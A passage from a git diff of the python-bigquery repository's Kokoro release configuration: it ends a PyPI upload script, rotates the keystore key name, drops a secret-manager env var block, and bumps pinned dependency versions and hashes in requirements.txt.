"${KOKORO_KEYSTORE_DIR}/73713_google-cloud-pypi-token-keystore-3") cd github/python-bigquery python3 setup.py sdist bdist_wheel twine upload --username __token__ --password "${TWINE_PASSWORD}" dist/* diff --git a/.kokoro/release/common.cfg b/.kokoro/release/common.cfg index 43b5a1f27..6f57163f5 100644 --- a/.kokoro/release/common.cfg +++ b/.kokoro/release/common.cfg @@ -28,17 +28,11 @@ before_action { fetch_keystore { keystore_resource { keystore_config_id: 73713 - keyname: "google-cloud-pypi-token-keystore-2" + keyname: "google-cloud-pypi-token-keystore-3" } } } -# Tokens needed to report release status back to GitHub -env_vars: { - key: "SECRET_MANAGER_KEYS" - value: "releasetool-publish-reporter-app,releasetool-publish-reporter-googleapis-installation,releasetool-publish-reporter-pem" -} - # Store the packages we uploaded to PyPI. That way, we have a record of exactly # what we published, which we can use to generate SBOMs and attestations. 
action { diff --git a/.kokoro/requirements.txt b/.kokoro/requirements.txt index 9622baf0b..006d8ef93 100644 --- a/.kokoro/requirements.txt +++ b/.kokoro/requirements.txt @@ -4,79 +4,94 @@ # # pip-compile --allow-unsafe --generate-hashes requirements.in # -argcomplete==3.4.0 \ - --hash=sha256:69a79e083a716173e5532e0fa3bef45f793f4e61096cf52b5a42c0211c8b8aa5 \ - --hash=sha256:c2abcdfe1be8ace47ba777d4fce319eb13bf8ad9dace8d085dcad6eded88057f +argcomplete==3.5.1 \ + --hash=sha256:1a1d148bdaa3e3b93454900163403df41448a248af01b6e849edc5ac08e6c363 \ + --hash=sha256:eb1ee355aa2557bd3d0145de7b06b2a45b0ce461e1e7813f5d066039ab4177b4 # via nox -attrs==23.2.0 \ - --hash=sha256:935dc3b529c262f6cf76e50877d35a4bd3c1de194fd41f47a2b7ae8f19971f30 \ - --hash=sha256:99b87a485a5820b23b879f04c2305b44b951b502fd64be915879d77a7e8fc6f1 +attrs==24.2.0 \ + --hash=sha256:5cfb1b9148b5b086569baec03f20d7b6bf3bcacc9a42bebf87ffaaca362f6346 \ + --hash=sha256:81921eb96de3191c8258c199618104dd27ac608d9366f5e35d011eae1867ede2 # via gcp-releasetool backports-tarfile==1.2.0 \ --hash=sha256:77e284d754527b01fb1e6fa8a1afe577858ebe4e9dad8919e34c862cb399bc34 \ --hash=sha256:d75e02c268746e1b8144c278978b6e98e85de6ad16f8e4b0844a154557eca991 # via jaraco-context -cachetools==5.3.3 \ - --hash=sha256:0abad1021d3f8325b2fc1d2e9c8b9c9d57b04c3932657a72465447332c24d945 \ - --hash=sha256:ba29e2dfa0b8b556606f097407ed1aa62080ee108ab0dc5ec9d6a723a007d105 +cachetools==5.5.0 \ + --hash=sha256:02134e8439cdc2ffb62023ce1debca2944c3f289d66bb17ead3ab3dede74b292 \ + --hash=sha256:2cc24fb4cbe39633fb7badd9db9ca6295d766d9c2995f245725a46715d050f2a # via google-auth -certifi==2024.7.4 \ - --hash=sha256:5a1e7645bc0ec61a09e26c36f6106dd4cf40c6db3a1fb6352b0244e7fb057c7b \ - --hash=sha256:c198e21b1289c2ab85ee4e67bb4b4ef3ead0892059901a8d5b622f24a1101e90 +certifi==2024.8.30 \ + --hash=sha256:922820b53db7a7257ffbda3f597266d435245903d80737e34f8a45ff3e3230d8 \ + --hash=sha256:bec941d2aa8195e248a60b31ff9f0558284cf01a52591ceda73ea9afffd69fd9 # via 
requests -cffi==1.16.0 \ - --hash=sha256:0c9ef6ff37e974b73c25eecc13952c55bceed9112be2d9d938ded8e856138bcc \ - --hash=sha256:131fd094d1065b19540c3d72594260f118b231090295d8c34e19a7bbcf2e860a \ - --hash=sha256:1b8ebc27c014c59692bb2664c7d13ce7a6e9a629be20e54e7271fa696ff2b417 \ - --hash=sha256:2c56b361916f390cd758a57f2e16233eb4f64bcbeee88a4881ea90fca14dc6ab \ - --hash=sha256:2d92b25dbf6cae33f65005baf472d2c245c050b1ce709cc4588cdcdd5495b520 \ - --hash=sha256:31d13b0f99e0836b7ff893d37af07366ebc90b678b6664c955b54561fc36ef36 \ - --hash=sha256:32c68ef735dbe5857c810328cb2481e24722a59a2003018885514d4c09af9743 \ - --hash=sha256:3686dffb02459559c74dd3d81748269ffb0eb027c39a6fc99502de37d501faa8 \ - --hash=sha256:582215a0e9adbe0e379761260553ba11c58943e4bbe9c36430c4ca6ac74b15ed \ - --hash=sha256:5b50bf3f55561dac5438f8e70bfcdfd74543fd60df5fa5f62d94e5867deca684 \ - --hash=sha256:5bf44d66cdf9e893637896c7faa22298baebcd18d1ddb6d2626a6e39793a1d56 \ - --hash=sha256:6602bc8dc6f3a9e02b6c22c4fc1e47aa50f8f8e6d3f78a5e16ac33ef5fefa324 \ - --hash=sha256:673739cb539f8cdaa07d92d02efa93c9ccf87e345b9a0b556e3ecc666718468d \ - --hash=sha256:68678abf380b42ce21a5f2abde8efee05c114c2fdb2e9eef2efdb0257fba1235 \ - --hash=sha256:68e7c44931cc171c54ccb702482e9fc723192e88d25a0e133edd7aff8fcd1f6e \ - --hash=sha256:6b3d6606d369fc1da4fd8c357d026317fbb9c9b75d36dc16e90e84c26854b088 \ - --hash=sha256:748dcd1e3d3d7cd5443ef03ce8685043294ad6bd7c02a38d1bd367cfd968e000 \ - --hash=sha256:7651c50c8c5ef7bdb41108b7b8c5a83013bfaa8a935590c5d74627c047a583c7 \ - --hash=sha256:7b78010e7b97fef4bee1e896df8a4bbb6712b7f05b7ef630f9d1da00f6444d2e \ - --hash=sha256:7e61e3e4fa664a8588aa25c883eab612a188c725755afff6289454d6362b9673 \ - --hash=sha256:80876338e19c951fdfed6198e70bc88f1c9758b94578d5a7c4c91a87af3cf31c \ - --hash=sha256:8895613bcc094d4a1b2dbe179d88d7fb4a15cee43c052e8885783fac397d91fe \ - --hash=sha256:88e2b3c14bdb32e440be531ade29d3c50a1a59cd4e51b1dd8b0865c54ea5d2e2 \ - 
--hash=sha256:8f8e709127c6c77446a8c0a8c8bf3c8ee706a06cd44b1e827c3e6a2ee6b8c098 \ - --hash=sha256:9cb4a35b3642fc5c005a6755a5d17c6c8b6bcb6981baf81cea8bfbc8903e8ba8 \ - --hash=sha256:9f90389693731ff1f659e55c7d1640e2ec43ff725cc61b04b2f9c6d8d017df6a \ - --hash=sha256:a09582f178759ee8128d9270cd1344154fd473bb77d94ce0aeb2a93ebf0feaf0 \ - --hash=sha256:a6a14b17d7e17fa0d207ac08642c8820f84f25ce17a442fd15e27ea18d67c59b \ - --hash=sha256:a72e8961a86d19bdb45851d8f1f08b041ea37d2bd8d4fd19903bc3083d80c896 \ - --hash=sha256:abd808f9c129ba2beda4cfc53bde801e5bcf9d6e0f22f095e45327c038bfe68e \ - --hash=sha256:ac0f5edd2360eea2f1daa9e26a41db02dd4b0451b48f7c318e217ee092a213e9 \ - --hash=sha256:b29ebffcf550f9da55bec9e02ad430c992a87e5f512cd63388abb76f1036d8d2 \ - --hash=sha256:b2ca4e77f9f47c55c194982e10f058db063937845bb2b7a86c84a6cfe0aefa8b \ - --hash=sha256:b7be2d771cdba2942e13215c4e340bfd76398e9227ad10402a8767ab1865d2e6 \ - --hash=sha256:b84834d0cf97e7d27dd5b7f3aca7b6e9263c56308ab9dc8aae9784abb774d404 \ - --hash=sha256:b86851a328eedc692acf81fb05444bdf1891747c25af7529e39ddafaf68a4f3f \ - --hash=sha256:bcb3ef43e58665bbda2fb198698fcae6776483e0c4a631aa5647806c25e02cc0 \ - --hash=sha256:c0f31130ebc2d37cdd8e44605fb5fa7ad59049298b3f745c74fa74c62fbfcfc4 \ - --hash=sha256:c6a164aa47843fb1b01e941d385aab7215563bb8816d80ff3a363a9f8448a8dc \ - --hash=sha256:d8a9d3ebe49f084ad71f9269834ceccbf398253c9fac910c4fd7053ff1386936 \ - --hash=sha256:db8e577c19c0fda0beb7e0d4e09e0ba74b1e4c092e0e40bfa12fe05b6f6d75ba \ - --hash=sha256:dc9b18bf40cc75f66f40a7379f6a9513244fe33c0e8aa72e2d56b0196a7ef872 \ - --hash=sha256:e09f3ff613345df5e8c3667da1d918f9149bd623cd9070c983c013792a9a62eb \ - --hash=sha256:e4108df7fe9b707191e55f33efbcb2d81928e10cea45527879a4749cbe472614 \ - --hash=sha256:e6024675e67af929088fda399b2094574609396b1decb609c55fa58b028a32a1 \ - --hash=sha256:e70f54f1796669ef691ca07d046cd81a29cb4deb1e5f942003f401c0c4a2695d \ - --hash=sha256:e715596e683d2ce000574bae5d07bd522c781a822866c20495e52520564f0969 \ - 
--hash=sha256:e760191dd42581e023a68b758769e2da259b5d52e3103c6060ddc02c9edb8d7b \ - --hash=sha256:ed86a35631f7bfbb28e108dd96773b9d5a6ce4811cf6ea468bb6a359b256b1e4 \ - --hash=sha256:ee07e47c12890ef248766a6e55bd38ebfb2bb8edd4142d56db91b21ea68b7627 \ - --hash=sha256:fa3a0128b152627161ce47201262d3140edb5a5c3da88d73a1b790a959126956 \ - --hash=sha256:fcc8eb6d5902bb1cf6dc4f187ee3ea80a1eba0a89aba40a5cb20a5087d961357 +cffi==1.17.1 \ + --hash=sha256:045d61c734659cc045141be4bae381a41d89b741f795af1dd018bfb532fd0df8 \ + --hash=sha256:0984a4925a435b1da406122d4d7968dd861c1385afe3b45ba82b750f229811e2 \ + --hash=sha256:0e2b1fac190ae3ebfe37b979cc1ce69c81f4e4fe5746bb401dca63a9062cdaf1 \ + --hash=sha256:0f048dcf80db46f0098ccac01132761580d28e28bc0f78ae0d58048063317e15 \ + --hash=sha256:1257bdabf294dceb59f5e70c64a3e2f462c30c7ad68092d01bbbfb1c16b1ba36 \ + --hash=sha256:1c39c6016c32bc48dd54561950ebd6836e1670f2ae46128f67cf49e789c52824 \ + --hash=sha256:1d599671f396c4723d016dbddb72fe8e0397082b0a77a4fab8028923bec050e8 \ + --hash=sha256:28b16024becceed8c6dfbc75629e27788d8a3f9030691a1dbf9821a128b22c36 \ + --hash=sha256:2bb1a08b8008b281856e5971307cc386a8e9c5b625ac297e853d36da6efe9c17 \ + --hash=sha256:30c5e0cb5ae493c04c8b42916e52ca38079f1b235c2f8ae5f4527b963c401caf \ + --hash=sha256:31000ec67d4221a71bd3f67df918b1f88f676f1c3b535a7eb473255fdc0b83fc \ + --hash=sha256:386c8bf53c502fff58903061338ce4f4950cbdcb23e2902d86c0f722b786bbe3 \ + --hash=sha256:3edc8d958eb099c634dace3c7e16560ae474aa3803a5df240542b305d14e14ed \ + --hash=sha256:45398b671ac6d70e67da8e4224a065cec6a93541bb7aebe1b198a61b58c7b702 \ + --hash=sha256:46bf43160c1a35f7ec506d254e5c890f3c03648a4dbac12d624e4490a7046cd1 \ + --hash=sha256:4ceb10419a9adf4460ea14cfd6bc43d08701f0835e979bf821052f1805850fe8 \ + --hash=sha256:51392eae71afec0d0c8fb1a53b204dbb3bcabcb3c9b807eedf3e1e6ccf2de903 \ + --hash=sha256:5da5719280082ac6bd9aa7becb3938dc9f9cbd57fac7d2871717b1feb0902ab6 \ + 
--hash=sha256:610faea79c43e44c71e1ec53a554553fa22321b65fae24889706c0a84d4ad86d \ + --hash=sha256:636062ea65bd0195bc012fea9321aca499c0504409f413dc88af450b57ffd03b \ + --hash=sha256:6883e737d7d9e4899a8a695e00ec36bd4e5e4f18fabe0aca0efe0a4b44cdb13e \ + --hash=sha256:6b8b4a92e1c65048ff98cfe1f735ef8f1ceb72e3d5f0c25fdb12087a23da22be \ + --hash=sha256:6f17be4345073b0a7b8ea599688f692ac3ef23ce28e5df79c04de519dbc4912c \ + --hash=sha256:706510fe141c86a69c8ddc029c7910003a17353970cff3b904ff0686a5927683 \ + --hash=sha256:72e72408cad3d5419375fc87d289076ee319835bdfa2caad331e377589aebba9 \ + --hash=sha256:733e99bc2df47476e3848417c5a4540522f234dfd4ef3ab7fafdf555b082ec0c \ + --hash=sha256:7596d6620d3fa590f677e9ee430df2958d2d6d6de2feeae5b20e82c00b76fbf8 \ + --hash=sha256:78122be759c3f8a014ce010908ae03364d00a1f81ab5c7f4a7a5120607ea56e1 \ + --hash=sha256:805b4371bf7197c329fcb3ead37e710d1bca9da5d583f5073b799d5c5bd1eee4 \ + --hash=sha256:85a950a4ac9c359340d5963966e3e0a94a676bd6245a4b55bc43949eee26a655 \ + --hash=sha256:8f2cdc858323644ab277e9bb925ad72ae0e67f69e804f4898c070998d50b1a67 \ + --hash=sha256:9755e4345d1ec879e3849e62222a18c7174d65a6a92d5b346b1863912168b595 \ + --hash=sha256:98e3969bcff97cae1b2def8ba499ea3d6f31ddfdb7635374834cf89a1a08ecf0 \ + --hash=sha256:a08d7e755f8ed21095a310a693525137cfe756ce62d066e53f502a83dc550f65 \ + --hash=sha256:a1ed2dd2972641495a3ec98445e09766f077aee98a1c896dcb4ad0d303628e41 \ + --hash=sha256:a24ed04c8ffd54b0729c07cee15a81d964e6fee0e3d4d342a27b020d22959dc6 \ + --hash=sha256:a45e3c6913c5b87b3ff120dcdc03f6131fa0065027d0ed7ee6190736a74cd401 \ + --hash=sha256:a9b15d491f3ad5d692e11f6b71f7857e7835eb677955c00cc0aefcd0669adaf6 \ + --hash=sha256:ad9413ccdeda48c5afdae7e4fa2192157e991ff761e7ab8fdd8926f40b160cc3 \ + --hash=sha256:b2ab587605f4ba0bf81dc0cb08a41bd1c0a5906bd59243d56bad7668a6fc6c16 \ + --hash=sha256:b62ce867176a75d03a665bad002af8e6d54644fad99a3c70905c543130e39d93 \ + --hash=sha256:c03e868a0b3bc35839ba98e74211ed2b05d2119be4e8a0f224fba9384f1fe02e \ + 
--hash=sha256:c59d6e989d07460165cc5ad3c61f9fd8f1b4796eacbd81cee78957842b834af4 \ + --hash=sha256:c7eac2ef9b63c79431bc4b25f1cd649d7f061a28808cbc6c47b534bd789ef964 \ + --hash=sha256:c9c3d058ebabb74db66e431095118094d06abf53284d9c81f27300d0e0d8bc7c \ + --hash=sha256:ca74b8dbe6e8e8263c0ffd60277de77dcee6c837a3d0881d8c1ead7268c9e576 \ + --hash=sha256:caaf0640ef5f5517f49bc275eca1406b0ffa6aa184892812030f04c2abf589a0 \ + --hash=sha256:cdf5ce3acdfd1661132f2a9c19cac174758dc2352bfe37d98aa7512c6b7178b3 \ + --hash=sha256:d016c76bdd850f3c626af19b0542c9677ba156e4ee4fccfdd7848803533ef662 \ + --hash=sha256:d01b12eeeb4427d3110de311e1774046ad344f5b1a7403101878976ecd7a10f3 \ + --hash=sha256:d63afe322132c194cf832bfec0dc69a99fb9bb6bbd550f161a49e9e855cc78ff \ + --hash=sha256:da95af8214998d77a98cc14e3a3bd00aa191526343078b530ceb0bd710fb48a5 \ + --hash=sha256:dd398dbc6773384a17fe0d3e7eeb8d1a21c2200473ee6806bb5e6a8e62bb73dd \ + --hash=sha256:de2ea4b5833625383e464549fec1bc395c1bdeeb5f25c4a3a82b5a8c756ec22f \ + --hash=sha256:de55b766c7aa2e2a3092c51e0483d700341182f08e67c63630d5b6f200bb28e5 \ + --hash=sha256:df8b1c11f177bc2313ec4b2d46baec87a5f3e71fc8b45dab2ee7cae86d9aba14 \ + --hash=sha256:e03eab0a8677fa80d646b5ddece1cbeaf556c313dcfac435ba11f107ba117b5d \ + --hash=sha256:e221cf152cff04059d011ee126477f0d9588303eb57e88923578ace7baad17f9 \ + --hash=sha256:e31ae45bc2e29f6b2abd0de1cc3b9d5205aa847cafaecb8af1476a609a2f6eb7 \ + --hash=sha256:edae79245293e15384b51f88b00613ba9f7198016a5948b5dddf4917d4d26382 \ + --hash=sha256:f1e22e8c4419538cb197e4dd60acc919d7696e5ef98ee4da4e01d3f8cfa4cc5a \ + --hash=sha256:f3a2b4222ce6b60e2e8b337bb9596923045681d71e5a082783484d845390938e \ + --hash=sha256:f6a16c31041f09ead72d69f583767292f750d24913dadacf5756b966aacb3f1a \ + --hash=sha256:f75c7ab1f9e4aca5414ed4d8e5c0e303a34f4421f8a0d47a4d019ceff0ab6af4 \ + --hash=sha256:f79fc4fc25f1c8698ff97788206bb3c2598949bfe0fef03d299eb1b5356ada99 \ + --hash=sha256:f7f5baafcc48261359e14bcd6d9bff6d4b28d9103847c9e136694cb0501aef87 \ + 
--hash=sha256:fc48c783f9c87e60831201f2cce7f3b2e4846bf4d8728eabe54d60700b318a0b # via cryptography charset-normalizer==2.1.1 \ --hash=sha256:5a3d016c7c547f69d6f81fb0db9449ce888b418b5b9952cc5e6e66843e9dd845 \ @@ -97,72 +112,67 @@ colorlog==6.8.2 \ # via # gcp-docuploader # nox -cryptography==42.0.8 \ - --hash=sha256:013629ae70b40af70c9a7a5db40abe5d9054e6f4380e50ce769947b73bf3caad \ - --hash=sha256:2346b911eb349ab547076f47f2e035fc8ff2c02380a7cbbf8d87114fa0f1c583 \ - --hash=sha256:2f66d9cd9147ee495a8374a45ca445819f8929a3efcd2e3df6428e46c3cbb10b \ - --hash=sha256:2f88d197e66c65be5e42cd72e5c18afbfae3f741742070e3019ac8f4ac57262c \ - --hash=sha256:31f721658a29331f895a5a54e7e82075554ccfb8b163a18719d342f5ffe5ecb1 \ - --hash=sha256:343728aac38decfdeecf55ecab3264b015be68fc2816ca800db649607aeee648 \ - --hash=sha256:5226d5d21ab681f432a9c1cf8b658c0cb02533eece706b155e5fbd8a0cdd3949 \ - --hash=sha256:57080dee41209e556a9a4ce60d229244f7a66ef52750f813bfbe18959770cfba \ - --hash=sha256:5a94eccb2a81a309806027e1670a358b99b8fe8bfe9f8d329f27d72c094dde8c \ - --hash=sha256:6b7c4f03ce01afd3b76cf69a5455caa9cfa3de8c8f493e0d3ab7d20611c8dae9 \ - --hash=sha256:7016f837e15b0a1c119d27ecd89b3515f01f90a8615ed5e9427e30d9cdbfed3d \ - --hash=sha256:81884c4d096c272f00aeb1f11cf62ccd39763581645b0812e99a91505fa48e0c \ - --hash=sha256:81d8a521705787afe7a18d5bfb47ea9d9cc068206270aad0b96a725022e18d2e \ - --hash=sha256:8d09d05439ce7baa8e9e95b07ec5b6c886f548deb7e0f69ef25f64b3bce842f2 \ - --hash=sha256:961e61cefdcb06e0c6d7e3a1b22ebe8b996eb2bf50614e89384be54c48c6b63d \ - --hash=sha256:9c0c1716c8447ee7dbf08d6db2e5c41c688544c61074b54fc4564196f55c25a7 \ - --hash=sha256:a0608251135d0e03111152e41f0cc2392d1e74e35703960d4190b2e0f4ca9c70 \ - --hash=sha256:a0c5b2b0585b6af82d7e385f55a8bc568abff8923af147ee3c07bd8b42cda8b2 \ - --hash=sha256:ad803773e9df0b92e0a817d22fd8a3675493f690b96130a5e24f1b8fabbea9c7 \ - --hash=sha256:b297f90c5723d04bcc8265fc2a0f86d4ea2e0f7ab4b6994459548d3a6b992a14 \ - 
--hash=sha256:ba4f0a211697362e89ad822e667d8d340b4d8d55fae72cdd619389fb5912eefe \ - --hash=sha256:c4783183f7cb757b73b2ae9aed6599b96338eb957233c58ca8f49a49cc32fd5e \ - --hash=sha256:c9bb2ae11bfbab395bdd072985abde58ea9860ed84e59dbc0463a5d0159f5b71 \ - --hash=sha256:cafb92b2bc622cd1aa6a1dce4b93307792633f4c5fe1f46c6b97cf67073ec961 \ - --hash=sha256:d45b940883a03e19e944456a558b67a41160e367a719833c53de6911cabba2b7 \ - --hash=sha256:dc0fdf6787f37b1c6b08e6dfc892d9d068b5bdb671198c72072828b80bd5fe4c \ - --hash=sha256:dea567d1b0e8bc5764b9443858b673b734100c2871dc93163f58c46a97a83d28 \ - --hash=sha256:dec9b018df185f08483f294cae6ccac29e7a6e0678996587363dc352dc65c842 \ - --hash=sha256:e3ec3672626e1b9e55afd0df6d774ff0e953452886e06e0f1eb7eb0c832e8902 \ - --hash=sha256:e599b53fd95357d92304510fb7bda8523ed1f79ca98dce2f43c115950aa78801 \ - --hash=sha256:fa76fbb7596cc5839320000cdd5d0955313696d9511debab7ee7278fc8b5c84a \ - --hash=sha256:fff12c88a672ab9c9c1cf7b0c80e3ad9e2ebd9d828d955c126be4fd3e5578c9e +cryptography==43.0.1 \ + --hash=sha256:014f58110f53237ace6a408b5beb6c427b64e084eb451ef25a28308270086494 \ + --hash=sha256:1bbcce1a551e262dfbafb6e6252f1ae36a248e615ca44ba302df077a846a8806 \ + --hash=sha256:203e92a75716d8cfb491dc47c79e17d0d9207ccffcbcb35f598fbe463ae3444d \ + --hash=sha256:27e613d7077ac613e399270253259d9d53872aaf657471473ebfc9a52935c062 \ + --hash=sha256:2bd51274dcd59f09dd952afb696bf9c61a7a49dfc764c04dd33ef7a6b502a1e2 \ + --hash=sha256:38926c50cff6f533f8a2dae3d7f19541432610d114a70808f0926d5aaa7121e4 \ + --hash=sha256:511f4273808ab590912a93ddb4e3914dfd8a388fed883361b02dea3791f292e1 \ + --hash=sha256:58d4e9129985185a06d849aa6df265bdd5a74ca6e1b736a77959b498e0505b85 \ + --hash=sha256:5b43d1ea6b378b54a1dc99dd8a2b5be47658fe9a7ce0a58ff0b55f4b43ef2b84 \ + --hash=sha256:61ec41068b7b74268fa86e3e9e12b9f0c21fcf65434571dbb13d954bceb08042 \ + --hash=sha256:666ae11966643886c2987b3b721899d250855718d6d9ce41b521252a17985f4d \ + 
--hash=sha256:68aaecc4178e90719e95298515979814bda0cbada1256a4485414860bd7ab962 \ + --hash=sha256:7c05650fe8023c5ed0d46793d4b7d7e6cd9c04e68eabe5b0aeea836e37bdcec2 \ + --hash=sha256:80eda8b3e173f0f247f711eef62be51b599b5d425c429b5d4ca6a05e9e856baa \ + --hash=sha256:8385d98f6a3bf8bb2d65a73e17ed87a3ba84f6991c155691c51112075f9ffc5d \ + --hash=sha256:88cce104c36870d70c49c7c8fd22885875d950d9ee6ab54df2745f83ba0dc365 \ + --hash=sha256:9d3cdb25fa98afdd3d0892d132b8d7139e2c087da1712041f6b762e4f807cc96 \ + --hash=sha256:a575913fb06e05e6b4b814d7f7468c2c660e8bb16d8d5a1faf9b33ccc569dd47 \ + --hash=sha256:ac119bb76b9faa00f48128b7f5679e1d8d437365c5d26f1c2c3f0da4ce1b553d \ + --hash=sha256:c1332724be35d23a854994ff0b66530119500b6053d0bd3363265f7e5e77288d \ + --hash=sha256:d03a475165f3134f773d1388aeb19c2d25ba88b6a9733c5c590b9ff7bbfa2e0c \ + --hash=sha256:d75601ad10b059ec832e78823b348bfa1a59f6b8d545db3a24fd44362a1564cb \ + --hash=sha256:de41fd81a41e53267cb020bb3a7212861da53a7d39f863585d13ea11049cf277 \ + --hash=sha256:e710bf40870f4db63c3d7d929aa9e09e4e7ee219e703f949ec4073b4294f6172 \ + --hash=sha256:ea25acb556320250756e53f9e20a4177515f012c9eaea17eb7587a8c4d8ae034 \ + --hash=sha256:f98bf604c82c416bc829e490c700ca1553eafdf2912a91e23a79d97d9801372a \ + --hash=sha256:fba1007b3ef89946dbbb515aeeb41e30203b004f0b4b00e5e16078b518563289 # via # -r requirements.in # gcp-releasetool # secretstorage -distlib==0.3.8 \ - --hash=sha256:034db59a0b96f8ca18035f36290806a9a6e6bd9d1ff91e45a7f172eb17e51784 \ - --hash=sha256:1530ea13e350031b6312d8580ddb6b27a104275a31106523b8f123787f494f64 +distlib==0.3.9 \ + --hash=sha256:47f8c22fd27c27e25a65601af709b38e4f0a45ea4fc2e710f65755fa8caaaf87 \ + --hash=sha256:a60f20dea646b8a33f3e7772f74dc0b2d0772d2837ee1342a00645c81edf9403 # via virtualenv docutils==0.21.2 \ --hash=sha256:3a6b18732edf182daa3cd12775bbb338cf5691468f91eeeb109deff6ebfa986f \ --hash=sha256:dafca5b9e384f0e419294eb4d2ff9fa826435bf15f15b7bd45723e8ad76811b2 # via readme-renderer -filelock==3.15.4 \ - 
--hash=sha256:2207938cbc1844345cb01a5a95524dae30f0ce089eba5b00378295a17e3e90cb \ - --hash=sha256:6ca1fffae96225dab4c6eaf1c4f4f28cd2568d3ec2a44e15a08520504de468e7 +filelock==3.16.1 \ + --hash=sha256:2082e5703d51fbf98ea75855d9d5527e33d8ff23099bec374a134febee6946b0 \ + --hash=sha256:c249fbfcd5db47e5e2d6d62198e565475ee65e4831e2561c8e313fa7eb961435 # via virtualenv gcp-docuploader==0.6.5 \ --hash=sha256:30221d4ac3e5a2b9c69aa52fdbef68cc3f27d0e6d0d90e220fc024584b8d2318 \ --hash=sha256:b7458ef93f605b9d46a4bf3a8dc1755dad1f31d030c8679edf304e343b347eea # via -r requirements.in -gcp-releasetool==2.0.1 \ - --hash=sha256:34314a910c08e8911d9c965bd44f8f2185c4f556e737d719c33a41f6a610de96 \ - --hash=sha256:b0d5863c6a070702b10883d37c4bdfd74bf930fe417f36c0c965d3b7c779ae62 +gcp-releasetool==2.1.1 \ + --hash=sha256:25639269f4eae510094f9dbed9894977e1966933211eb155a451deebc3fc0b30 \ + --hash=sha256:845f4ded3d9bfe8cc7fdaad789e83f4ea014affa77785259a7ddac4b243e099e # via -r requirements.in -google-api-core==2.19.1 \ - --hash=sha256:f12a9b8309b5e21d92483bbd47ce2c445861ec7d269ef6784ecc0ea8c1fa6125 \ - --hash=sha256:f4695f1e3650b316a795108a76a1c416e6afb036199d1c1f1f110916df479ffd +google-api-core==2.21.0 \ + --hash=sha256:4a152fd11a9f774ea606388d423b68aa7e6d6a0ffe4c8266f74979613ec09f81 \ + --hash=sha256:6869eacb2a37720380ba5898312af79a4d30b8bca1548fb4093e0697dc4bdf5d # via # google-cloud-core # google-cloud-storage -google-auth==2.31.0 \ - --hash=sha256:042c4702efa9f7d3c48d3a69341c209381b125faa6dbf3ebe56bc7e40ae05c23 \ - --hash=sha256:87805c36970047247c8afe614d4e3af8eceafc1ebba0c679fe75ddd1d575e871 +google-auth==2.35.0 \ + --hash=sha256:25df55f327ef021de8be50bad0dfd4a916ad0de96da86cd05661c9297723ad3f \ + --hash=sha256:f4c64ed4e01e8e8b646ef34c018f8bf3338df0c8e37d8b3bba40e7f574a3278a # via # gcp-releasetool # google-api-core @@ -172,97 +182,56 @@ google-cloud-core==2.4.1 \ --hash=sha256:9b7749272a812bde58fff28868d0c5e2f585b82f37e09a1f6ed2d4d10f134073 \ 
--hash=sha256:a9e6a4422b9ac5c29f79a0ede9485473338e2ce78d91f2370c01e730eab22e61 # via google-cloud-storage -google-cloud-storage==2.17.0 \ - --hash=sha256:49378abff54ef656b52dca5ef0f2eba9aa83dc2b2c72c78714b03a1a95fe9388 \ - --hash=sha256:5b393bc766b7a3bc6f5407b9e665b2450d36282614b7945e570b3480a456d1e1 +google-cloud-storage==2.18.2 \ + --hash=sha256:97a4d45c368b7d401ed48c4fdfe86e1e1cb96401c9e199e419d289e2c0370166 \ + --hash=sha256:aaf7acd70cdad9f274d29332673fcab98708d0e1f4dceb5a5356aaef06af4d99 # via gcp-docuploader -google-crc32c==1.5.0 \ - --hash=sha256:024894d9d3cfbc5943f8f230e23950cd4906b2fe004c72e29b209420a1e6b05a \ - --hash=sha256:02c65b9817512edc6a4ae7c7e987fea799d2e0ee40c53ec573a692bee24de876 \ - --hash=sha256:02ebb8bf46c13e36998aeaad1de9b48f4caf545e91d14041270d9dca767b780c \ - --hash=sha256:07eb3c611ce363c51a933bf6bd7f8e3878a51d124acfc89452a75120bc436289 \ - --hash=sha256:1034d91442ead5a95b5aaef90dbfaca8633b0247d1e41621d1e9f9db88c36298 \ - --hash=sha256:116a7c3c616dd14a3de8c64a965828b197e5f2d121fedd2f8c5585c547e87b02 \ - --hash=sha256:19e0a019d2c4dcc5e598cd4a4bc7b008546b0358bd322537c74ad47a5386884f \ - --hash=sha256:1c7abdac90433b09bad6c43a43af253e688c9cfc1c86d332aed13f9a7c7f65e2 \ - --hash=sha256:1e986b206dae4476f41bcec1faa057851f3889503a70e1bdb2378d406223994a \ - --hash=sha256:272d3892a1e1a2dbc39cc5cde96834c236d5327e2122d3aaa19f6614531bb6eb \ - --hash=sha256:278d2ed7c16cfc075c91378c4f47924c0625f5fc84b2d50d921b18b7975bd210 \ - --hash=sha256:2ad40e31093a4af319dadf503b2467ccdc8f67c72e4bcba97f8c10cb078207b5 \ - --hash=sha256:2e920d506ec85eb4ba50cd4228c2bec05642894d4c73c59b3a2fe20346bd00ee \ - --hash=sha256:3359fc442a743e870f4588fcf5dcbc1bf929df1fad8fb9905cd94e5edb02e84c \ - --hash=sha256:37933ec6e693e51a5b07505bd05de57eee12f3e8c32b07da7e73669398e6630a \ - --hash=sha256:398af5e3ba9cf768787eef45c803ff9614cc3e22a5b2f7d7ae116df8b11e3314 \ - --hash=sha256:3b747a674c20a67343cb61d43fdd9207ce5da6a99f629c6e2541aa0e89215bcd \ - 
--hash=sha256:461665ff58895f508e2866824a47bdee72497b091c730071f2b7575d5762ab65 \ - --hash=sha256:4c6fdd4fccbec90cc8a01fc00773fcd5fa28db683c116ee3cb35cd5da9ef6c37 \ - --hash=sha256:5829b792bf5822fd0a6f6eb34c5f81dd074f01d570ed7f36aa101d6fc7a0a6e4 \ - --hash=sha256:596d1f98fc70232fcb6590c439f43b350cb762fb5d61ce7b0e9db4539654cc13 \ - --hash=sha256:5ae44e10a8e3407dbe138984f21e536583f2bba1be9491239f942c2464ac0894 \ - --hash=sha256:635f5d4dd18758a1fbd1049a8e8d2fee4ffed124462d837d1a02a0e009c3ab31 \ - --hash=sha256:64e52e2b3970bd891309c113b54cf0e4384762c934d5ae56e283f9a0afcd953e \ - --hash=sha256:66741ef4ee08ea0b2cc3c86916ab66b6aef03768525627fd6a1b34968b4e3709 \ - --hash=sha256:67b741654b851abafb7bc625b6d1cdd520a379074e64b6a128e3b688c3c04740 \ - --hash=sha256:6ac08d24c1f16bd2bf5eca8eaf8304812f44af5cfe5062006ec676e7e1d50afc \ - --hash=sha256:6f998db4e71b645350b9ac28a2167e6632c239963ca9da411523bb439c5c514d \ - --hash=sha256:72218785ce41b9cfd2fc1d6a017dc1ff7acfc4c17d01053265c41a2c0cc39b8c \ - 